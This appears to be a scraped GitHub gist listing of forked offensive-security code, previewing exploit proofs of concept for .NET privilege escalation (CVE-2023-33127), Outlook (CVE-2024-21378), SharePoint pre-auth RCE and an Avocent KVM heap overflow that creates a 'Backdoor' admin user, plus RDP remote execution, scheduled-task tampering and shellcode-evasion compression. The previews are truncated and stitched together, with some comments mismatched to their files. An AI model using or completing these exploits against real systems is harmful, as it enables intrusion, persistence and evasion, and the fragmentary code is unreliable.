Super Hacker Bot - Verified by Github

ASkyeye
ASkyeye / CVE-2023-33127.cs
Created June 12, 2024 00:11 — forked from bohops/CVE-2023-33127.cs
CVE-2023-33127: .NET Cross-Session Privilege Escalation Exploit
// CVE-2023-33127 POC Exploit: .NET Cross-Session Privilege Escalation
// Ref: https://bohops.com/2023/11/27/abusing-net-core-clr-diagnostic-features-cve-2023-33127/
using System;
using System.Runtime.InteropServices;
using System.Threading;
using System.Diagnostics;
using System.Security.Principal;
using System.IO.Pipes;
using System.IO;
// Build d8 using:
// a) Run once
// git checkout 6f98fbe86a0d11e6c902e2ee50f609db046daf71
// gclient sync
// gn gen ./out/x64.debug
// gn gen ./out/x64.release
//
// b)
// Debug Build:
// ninja -C ./out/x64.debug d8
ASkyeye / test_dll.c
Created April 11, 2024 15:03 — forked from Homer28/test_dll.c
DLL code for testing CVE-2024-21378 in MS Outlook
/**
* This DLL is designed for use in conjunction with the Ruler tool for
* security testing related to the CVE-2024-21378 vulnerability,
* specifically targeting MS Outlook.
*
* It can be used with the following command line syntax:
* ruler [auth-params] form add-com [attack-params] --dll ./test.dll
* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
*
* After being loaded into MS Outlook, it sends the PC's hostname and
ASkyeye / demo.c
Created April 10, 2024 09:29 — forked from mistymntncop/demo.c
NtWaitForDebugEvent + WaitForMultipleObjects
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <windows.h>
#include "nt_crap.h"
#define ArrayCount(arr) (sizeof(arr)/sizeof(arr[0]))
#define assert(expr) if(!(expr)) { *(char*)0 = 0; }
ASkyeye / rdp-execute.py
Created March 7, 2024 18:30 — forked from jborean93/rdp-execute.py
POC for running processes over RDP - Very WIP
# Copyright: (c) 2024, Jordan Borean (@jborean93) <jborean93@gmail.com>
# MIT License (see LICENSE or https://opensource.org/licenses/MIT)
"""POC for running exe's over RDP
This is a very rough attempt at trying to run an exe using a headless RDP
connection. It aims to be able to provide an interactive console session as
well as a headless one.
Requires aardwolf - https://github.com/skelsec/aardwolf as a Python dependency.
ASkyeye / Invoke-GhostTask.ps1
Created January 5, 2024 12:47 — forked from Workingdaturah/Invoke-GhostTask.ps1
A PS1 Script intended to edit Scheduled Tasks via Registry Keys
function Invoke-GhostTask {
param (
[string]$TaskName,
[switch]$ShowTasks,
[string]$Id,
[string]$TargetTask,
[string]$TargetBinary,
[string]$Date,
[string]$Help
)
ASkyeye / rdp_pack.cpp
Created December 31, 2023 22:56 — forked from odzhan/rdp_pack.cpp
Compression using RDP API
/**
Compression using undocumented API in rdpbase.dll
RDPCompress supports four algorithms : MPPC-8K, MPPC-64K, NCRUSH and XCRUSH.
This code only supports compression and decompression using MPPC algorithms because these were the easiest to figure out.
The MPPC compression ratio is very similar to LZSS, so this could be quite useful for shellcode trying to evade detection.
I was unable to get decompression working for NCRUSH and XCRUSH, which is why I'm publishing this.
ASkyeye / SharePwn_public.py
Created December 15, 2023 11:48 — forked from testanull/SharePwn_public.py
SharePoint Pre-Auth Code Injection RCE chain CVE-2023-29357 & CVE-2023-24955 PoC
# -*- coding: utf-8 -*-
import hashlib
import base64
import requests, string, struct, uuid, random, re
import sys
from collections import OrderedDict
from sys import version
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# too lazy to deal with string <-> bytes confusion in python3 so forget it ¯\_(ツ)_/¯
ASkyeye / sleepy.md
Created December 14, 2023 20:39 — forked from EvanMcBroom/sleepy.md
Sleepy - Python Tooling for Sleep

Thank you to SpecterOps for supporting this research and to Sarah, Cody, and Daniel for proofreading and editing! Crossposted on the SpecterOps Blog.

TL;DR: You can use sleepy to automate common tasks when working with Sleep code.

Raphael Mudge created the embeddable scripting language, Sleep, in April 2002. Sleep was designed to extend Java applications and has been used in a few projects; most notably Cobalt Strike.

ASkyeye / asmpwn.py
Created December 9, 2023 15:08 — forked from aemmitt-ns/asmpwn.py
Remote pre-auth heap buffer overflow exploit for Avocent KVMs
import socket, struct, sys
p32 = lambda x: struct.pack(">I", x)
p16 = lambda x: struct.pack(">h", x)
p8 = lambda x: struct.pack(">b", x)
# ASMP heap overflow exploit creates new applianceAdmin user
def exploit(hostname, username="Backdoor", password="Backdoor"):
global socks # python closes out of scope sockets
port = 3211 # this is hardcoded in the binary
print(f"[*] Exploiting ASMP on {hostname} port {port}")